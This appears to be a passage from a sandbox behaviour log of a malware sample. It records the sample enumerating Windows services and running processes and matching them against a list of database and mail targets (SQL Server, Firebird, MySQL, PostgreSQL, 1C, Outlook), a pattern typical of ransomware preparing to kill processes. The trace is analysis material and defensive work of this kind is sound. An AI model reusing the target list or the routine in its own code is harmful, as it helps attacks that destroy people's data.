lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0033.840] lstrlenW (lpString="BFE") returned 3 [0033.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0033.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0033.840] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0033.840] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0033.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0033.840] lstrlenW (lpString="CryptSvc") returned 8 [0033.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0033.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0033.840] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0033.840] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0033.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0033.840] lstrlenW (lpString="CscService") returned 10 [0033.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0033.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0033.840] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0033.840] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0033.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0033.840] lstrlenW (lpString="DcomLaunch") returned 10 [0033.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0033.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0033.840] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0033.841] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0033.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0033.841] lstrlenW (lpString="Dhcp") returned 4 [0033.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0033.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0033.841] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0033.841] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0033.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0033.841] lstrlenW (lpString="Dnscache") returned 8 [0033.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0033.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0033.841] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0033.841] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0033.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0033.841] lstrlenW (lpString="DPS") returned 3 [0033.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0033.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0033.841] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0033.841] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0033.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0033.841] lstrlenW (lpString="eventlog") returned 8 [0033.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0033.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0033.841] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0033.841] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0033.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0033.841] lstrlenW (lpString="EventSystem") returned 11 [0033.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0033.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0033.841] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0033.841] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0033.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0033.842] lstrlenW (lpString="gpsvc") returned 5 [0033.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0033.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0033.842] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0033.842] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0033.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0033.842] lstrlenW (lpString="iphlpsvc") returned 8 [0033.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0033.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0033.842] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0033.842] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0033.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0033.842] lstrlenW (lpString="LanmanServer") returned 12 [0033.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0033.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0033.842] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0033.842] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0033.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0033.842] lstrlenW (lpString="LanmanWorkstation") returned 17 [0033.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0033.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0033.842] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0033.842] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0033.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0033.842] lstrlenW (lpString="lmhosts") returned 7 [0033.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0033.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0033.842] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0033.842] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0033.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0033.842] lstrlenW (lpString="MMCSS") returned 5 [0033.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0033.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0033.842] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0033.843] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0033.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0033.843] lstrlenW (lpString="MpsSvc") returned 6 [0033.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0033.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0033.843] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0033.843] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0033.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0033.843] lstrlenW (lpString="Netman") returned 6 [0033.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0033.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0033.843] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0033.843] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0033.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0033.843] lstrlenW (lpString="netprofm") returned 8 [0033.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0033.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0033.843] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0033.843] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0033.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0033.843] lstrlenW (lpString="NlaSvc") returned 6 [0033.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0033.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0033.843] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0033.843] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0033.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0033.843] lstrlenW (lpString="nsi") returned 3 [0033.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0033.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0033.843] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0033.843] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0033.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0033.843] lstrlenW (lpString="PcaSvc") returned 6 [0033.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0033.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0033.844] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0033.844] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0033.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0033.844] lstrlenW (lpString="PlugPlay") returned 8 [0033.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0033.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0033.844] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0033.844] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0033.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0033.844] lstrlenW (lpString="Power") returned 5 [0033.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0033.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0033.844] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0033.844] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0033.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0033.844] lstrlenW (lpString="ProfSvc") returned 7 [0033.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0033.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0033.844] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0033.844] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0033.844] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0033.844] lstrlenW (lpString="RpcEptMapper") returned 12 [0033.844] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0033.844] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0033.845] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0033.845] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0033.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0033.845] lstrlenW (lpString="RpcSs") returned 5 [0033.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0033.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0033.845] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0033.845] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0033.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0033.845] lstrlenW (lpString="SamSs") returned 5 [0033.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0033.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0033.845] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0033.845] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0033.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0033.845] lstrlenW (lpString="Schedule") returned 8 [0033.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0033.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0033.845] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0033.845] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0033.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0033.845] lstrlenW (lpString="SENS") returned 4 [0033.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0033.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0033.845] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0033.845] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0033.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0033.845] lstrlenW (lpString="ShellHWDetection") returned 16 [0033.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0033.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0033.845] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0033.845] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0033.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0033.846] lstrlenW (lpString="Spooler") returned 7 [0033.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0033.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0033.846] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0033.846] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0033.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0033.846] lstrlenW (lpString="SysMain") returned 7 [0033.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0033.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0033.846] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0033.846] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0033.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0033.846] lstrlenW (lpString="Themes") returned 6 [0033.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0033.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0033.846] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0033.846] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0033.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0033.846] lstrlenW (lpString="TrkWks") returned 6 [0033.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0033.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0033.846] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0033.846] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0033.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0033.846] lstrlenW (lpString="UxSms") returned 5 [0033.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0033.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0033.846] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0033.846] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0033.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0033.846] lstrlenW (lpString="WdiServiceHost") returned 14 [0033.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0033.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0033.846] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0033.846] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0033.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0033.847] lstrlenW (lpString="WdiSystemHost") returned 13 [0033.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0033.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0033.847] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0033.847] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0033.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0033.847] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0033.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0033.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0033.847] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0033.847] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0033.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0033.847] lstrlenW (lpString="Winmgmt") returned 7 [0033.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0033.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0033.847] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0033.847] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0033.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0033.847] lstrlenW (lpString="WPDBusEnum") returned 10 [0033.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0033.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0033.847] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0033.847] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0033.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0033.847] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x66e618 | out: hHeap=0x600000) returned 1 [0033.847] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x118 [0033.849] Process32FirstW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0033.849] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0033.850] lstrlenW (lpString="System") returned 6 [0033.850] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0033.850] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0033.850] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0033.850] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0033.850] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0033.850] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0033.850] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0033.850] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0033.851] lstrlenW (lpString="smss.exe") returned 8 [0033.851] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0033.851] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0033.851] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0033.851] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0033.851] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0033.851] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0033.851] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0033.851] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0033.851] lstrlenW (lpString="csrss.exe") returned 9 [0033.852] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0033.852] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0033.852] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0033.852] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0033.852] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0033.852] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0033.852] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0033.852] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0033.852] lstrlenW (lpString="wininit.exe") returned 11 [0033.852] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0033.852] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0033.852] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0033.852] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0033.852] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0033.852] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0033.852] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0033.852] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0033.853] lstrlenW (lpString="csrss.exe") returned 9 [0033.853] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0033.853] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0033.853] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0033.853] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0033.853] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0033.853] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0033.853] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0033.854] lstrlenW (lpString="winlogon.exe") returned 12 [0033.854] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0033.854] lstrlenW (lpString="services.exe") returned 12 [0033.854] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0033.855] lstrlenW (lpString="lsass.exe") returned 9 [0033.855] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0033.856] lstrlenW (lpString="lsm.exe") returned 7 [0033.856] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.857] lstrlenW (lpString="svchost.exe") returned 11 [0033.857] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.857] lstrlenW (lpString="svchost.exe") returned 11 [0033.857] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0033.858] lstrlenW (lpString="svchost.exe") returned 11 [0033.858] Process32NextW (in: hSnapshot=0x118, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, 